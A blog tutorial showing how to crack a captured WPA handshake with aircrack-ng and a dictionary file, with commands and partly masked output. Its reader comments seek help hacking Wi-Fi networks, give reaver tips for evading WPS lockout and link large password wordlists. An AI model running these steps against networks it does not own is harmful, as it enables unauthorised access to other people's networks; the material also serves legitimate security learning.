- Capture the handshake
- Crack the handshake to get the password
We have already covered WPA-handshake capture in a lot of detail. In this tutorial we will actually crack a WPA handshake file using dictionary attack. Our tool of choice for this tutorial will be aircrack-ng. We will not bother about the speed of various tools in this post. However, in the next post, we will compare various CPU and GPU algorithms for WPA hash cracking. I'd like to add that I already know the password of the network so I'll simply put it into the dictionary that I'm using. A full fledged dictionary attack is quite time consuming.
Also, a lot of people are facing problems with monitor mode in Kali 2.0. I have a post regarding that coming soon.
PS: If you stumbled on this post out of nowhere and find it hard to follow, I recommend you go through some of the easier posts first. How to use this site is a good place to begin.
My current state
I have already captured a WPA handshake for my Wifi. The password is fairly strong so one can't rely on any dictionary. So just for the sake of this exercise, I'll put the password in the dictionary myself.My handshake capture
The handshake is captured in a file students2-01.cap (you can name yours whatever you want)
wireshark students2-01.cap

My dictionary file
root@kali:~# cat new.txt
firstpass
secondpass
randompass
************
The last line has the password.
Action!
root@kali:~# aircrack-ng students2-01.cap -w new.txt
It will ask for index number of target network. Select the network you want to hack.
I chose 13
It didn't take any time at all considering Aircrack had to check a total of 4 keys!!!
Aircrack-ng 1.2 rc2
[00:00:00] 4 keys tested (589.45 k/s)
KEY FOUND! [ ***************** ]
Master Key : 60 B7 9D 29 26 0F 92 65 ** ** ** ** **
Transient Key : 1C F2 23 FE B3 67 ** ** ** *
EAPOL HMAC : F9 A1 5D ** ** ** ** **
Standard attacks too slow?
The standard attacks against WPA take too long. There a novel alternative. Using the Evil Twin attack to fool a client into giving you the AP's password. Sounds interesting? Take a look-
Is their any other way then dictionary, wps attack or crunching attack to crack WPA? which is more power full on single gpu password crack?
ReplyDeleteAnd what will be hash type of this capture(MD5,3 whatever)?
Hello guys,
ReplyDeleteTutorial :
http://softsana.blogspot.com/2015/12/huong-dan-cai-at-cmatrix-kali-linux-20.html
hi i dont know what i do ?plese do you halp me ..
ReplyDeleteplese bro halp me .
ReplyDeleteStop asking for 'halp' you moron and ask for something specific. Eediot.
DeleteAttack the pin would do but I keep getting errors
ReplyDeleteI am assuming you are talking about reaver error after running a wash. Sometimes this happens if you do not set a rate. In other words, the AP is not responding or does not have time to respond with a confirm or deny of the random WPS pin reaver is trying. Lower rate so its not a flood attack on AP.
DeleteCool post bro i got this thanks.
ReplyDeleteHello guys pls help me hack in wpa psk Wi-Fi..
ReplyDeleteHey fellas i made a video specifically for wps routers that get locked by reaver. If u ever get that error message like ap rate limiting detected or see wps locked = yes. in wash scan simply watch this video. Please
ReplyDeleteLike share and subscribe!
https://m.youtube.com/watch?v=y3ByYdVJFqg
you will need a Password Dictionary
ReplyDeleteyou may want to check this
Best Password Dictionary
Hi Sashwat,
ReplyDeleteThank you for your tutorials really helpful. I have captured a handshake of my own router and I am trying to bruteforce the password, I am using Hashcat with a powerful two graphic cards but I am unable to find the password. I have tried dark0de, rockyou and a couple of other dictionaries I found online. Could you please recommend the best dictionary of default router passwords?
Cheers
There are plenty of huge dictionaries around, but I think you're best off doing a intelligent bruteforce based on what you know about the target (length of password, numeric or alphanumeric, etc.)
DeleteIf you want dictionaries-
https://forums.hak5.org/index.php?/topic/29308-13gb-44gb-compressed-wpa-wpa2-word-list-982963904-words/
Man i want a good dictionary for this the links in the forum aren't working....plz help....!!
ReplyDeletesir i have mac adrress of netwrok channel and pin reaver nad aircrack is installed also i want to connect with the network ubuntu cammand ????
ReplyDeletehow to prevent standard attacks against wpa?
ReplyDeleteI am amazed by the way you have explained things in this article. Many thanks for sharing this useful content. Keep up the good work.
ReplyDeleteQuickbooks For Mac